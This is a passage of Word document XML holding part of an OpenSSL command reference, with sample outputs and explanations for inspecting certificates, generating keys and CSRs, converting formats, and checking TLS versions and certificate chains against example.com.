    <w:p w14:paraId="7E431FC2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Monitor certificate expiration for renewal planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70264CAF" w14:textId="160FBFC6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>View certificate details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858D57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openssl x509 -in certificate.crt -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302858E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA896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ertificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F070991"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Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C06D9E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Version: 3 (0x2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE1CDF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Serial Number:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7DAF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01:23:45:67:89:ab:cd:ef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04882C3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Signature Algorithm: sha256WithRSAEncryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714344E"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Issuer: C=US, O=Let's Encrypt, CN=R3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2792B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Validity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523546FC"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Not Before: Jan 15 08:25:00 2024 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F101B8"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Not After : Apr  8 08:24:59 2024 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBD75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Subject: CN=example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E038B5"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Subject Public Key Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC6260"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Public Key Algorithm: rsaEncryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86E8EC"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RSA Public-Key: (2048 bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A27CBB"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Modulus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597C0FD"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00:c9:2b:37:...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D38672"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Exponent: 65537 (0x10001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9A9C3"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X509v3 extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352A2B1"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X509v3 Subject Alternative Name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343815BA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A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 xml:space="preserve">                DNS:example.com, DNS:www.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6479A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Examine certificate contents and validity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1415C048" w14:textId="24AACE83" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Generate RSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E3BC3"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openssl genrsa -out private.key 2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C764C3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367133CE"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enerating RSA private key, 2048 bit long modulus (2 primes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD2AB3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BBDCBC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FEB9F"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e is 65537 (0x010001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEE5A3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Create private key for SSL certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C84DD" w14:textId="360FE79E" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Generate certificate signing request (CSR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F920CA5"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openssl req -new -key private.key -out request.csr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBE13F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCF66C"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You are about to be asked to enter information that will be incorporated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18863A1F"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into your certificate request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7070632B"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lastRenderedPageBreak/>
        <w:t>What you are about to enter is what is called a Distinguished Name or a DN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22995365"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here are quite a few fields but you can leave some blank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F211D62"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For some fields there will be a default value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647134AE"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If you enter '.', the field will be left blank.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FEEF9E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B7CA2"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ountry Name (2 letter code) [AU]:US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05290C7A"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tate or Province Name (full name) [Some-State]:California</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D04B96"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Locality Name (eg, city) []:San Francisco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF0823B"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Organization Name (eg, company) [Internet Widgits Pty Ltd]:Example Corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C1090F"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Organizational Unit Name (eg, section) []:IT Department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C854ABB"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Common Name (e.g. server FQDN or YOUR name) []:example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090D04F"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Email Address []:admin@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E944196"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78A4FDFE"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Please enter the following 'extra' attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0E5B1"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to be sent with your certificate request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968B135"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A challenge password []:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20632C7A"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An optional company name []:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADFF37" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Create CSR for certificate authority submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924B1FB" w14:textId="6EE8DA25" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Create self-signed certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCAB38"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openssl req -x509 -newkey rsa:2048 -keyout private.key -out certificate.crt -days 365 -nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D176A8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C1F9C7"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Generating a RSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43980C9A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B284A76"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD5488"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writing new private key to 'private.key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616099B4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F5865A"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You are about to be asked to enter information that will be incorporated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FFD1E"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into your certificate request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730E3A3E"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What you are about to enter is what is called a Distinguished Name or a DN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD4E45" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702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251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[Similar prompts as CSR generation]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10565A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Create development certificates for testing environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7264EB7D" w14:textId="76EA8E74" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Convert certificate formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB0D21"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x509 -outform der -in certificate.crt -out certificate.der</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22546E10" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F15A9" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-outform der</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Converts to DER (Distinguished Encoding Rules) binary format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEB091" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-in certificate.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Input file in PEM format (Base64 encoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738858AE" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-out certificate.der</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Output file in DER format (binary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BEF948" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No console output</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Successful conversion produces no terminal output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E128D" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary format</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: DER files are not human-readable (unlike PEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA8B6F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File size</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: DER files are typically smaller than PEM equivalents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53DD7E" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Platform compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Some systems prefer DER format (Windows, Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64FF25" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse conversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Use -inform der -outform pem to convert back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CF626" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Convert between PEM and DER certificate formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BE321" w14:textId="70CD1F9D" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Test specific SSL/TLS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB301E" w14:textId="0842BB41"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s_client -connect example.com:443 -tls1_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD97C1" w14:textId="0A69FBBD" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Quick SSL setup for development or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304443D0" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA3D62"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CONNECTED(00000003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641A2A1"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depth=2 C = US, O = DigiCert Inc, CN = DigiCert Global Root CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08E602"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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CCDAA"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depth=1 C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AE506"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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0F12C"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lastRenderedPageBreak/>
        <w:t>depth=0 CN = example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0DE3A"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verify return:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A4E95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A45792D"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Certificate chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646A564"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43B256"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D723E"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Server certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4AF08"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB9F25"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C053517"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New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2ADDE"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Server public key is 2048 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364D087"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Secure Renegotiation IS supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA08B55" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E0FE0" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-tls1_2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Forces connection to use only TLS version 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83CF9A" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONNECTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Successfully established connection using specified TLS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C02EE0" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLSv1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Confirms the negotiated protocol version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2F860" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECDHE-RSA-AES256-GCM-SHA384</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Specific cipher suite negotiated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F7323" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server public key</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Size of server's public key (2048 bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540CDA5" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secure Renegotiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Security feature support confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E1B2C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Useful for checking server TLS version support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58050D7F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compliance checking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Verify minimum TLS version requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E3A8EA" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Use -tls1_3, -tls1_1, -ssl3 for other versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3F971" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Verify support for specific TLS versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B153520" w14:textId="14699822" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Check certificate chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A3D4A1"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s_client -connect example.com:443 -showcerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132113AF" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FCE954"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CONNECTED(00000003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9023AA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B51D2E"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Certificate chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2D412F"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 xml:space="preserve"> 0 s:CN = example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A68E2"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 xml:space="preserve">   i:C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706AADF"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BEGIN CERTIFICATE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6281E"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MIIFYTCCBEmgAwIBAgIQDrF5j5aJ5J9TtI5zKwS5zTANBgkqhkiG9w0BAQsFADA...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CDF186"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END CERTIFICATE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7675D"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 xml:space="preserve"> 1 s:C = US, O = DigiCert Inc, CN = DigiCert TLS RSA SHA256 2020 CA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0531C7"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 xml:space="preserve">   i:C = US, O = DigiCert Inc, CN = DigiCert Global Root CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5374B7"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BEGIN CERTIFICATE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB146A8"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MIIEvjCCA6agAwIBAgIQBtjZBNVYQ0b2ii+nVCJ+6jANBgkqhkiG9w0BAQsFADA...</w:t>
      </w:r>
    </w:p>
